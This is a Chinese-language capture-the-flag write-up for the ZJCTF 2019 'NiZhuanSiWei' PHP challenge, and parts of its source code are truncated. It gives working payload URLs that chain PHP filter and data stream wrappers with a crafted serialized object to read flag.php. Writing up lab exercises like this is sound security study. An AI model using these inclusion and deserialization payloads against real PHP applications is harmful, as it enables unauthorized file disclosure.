（反序列化）[ZJCTF 2019]NiZhuanSiWei

".file_get_contents($text,'r')."
";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?> 

利用点：

include和echo

由于file过滤了flag，不能读取flag.php

先查看useless.php

这里用到伪协议

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,welcome to the zjctf

base64encode得到

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

得到

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo

file)){  
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

反序列化的连接点在这，让Flag类里的file为flag.php即可

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} //这样不行

//之后看别人的才发现问题

//还有之前反序列化的双引号是中文的（丢脸）

?file=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

值得注意的是得把php://filter/convert.base64-encode/resource=useless.php改回useless.php

不然里面的代码不会执行

补充一下echo会触发tostring（忘记说了）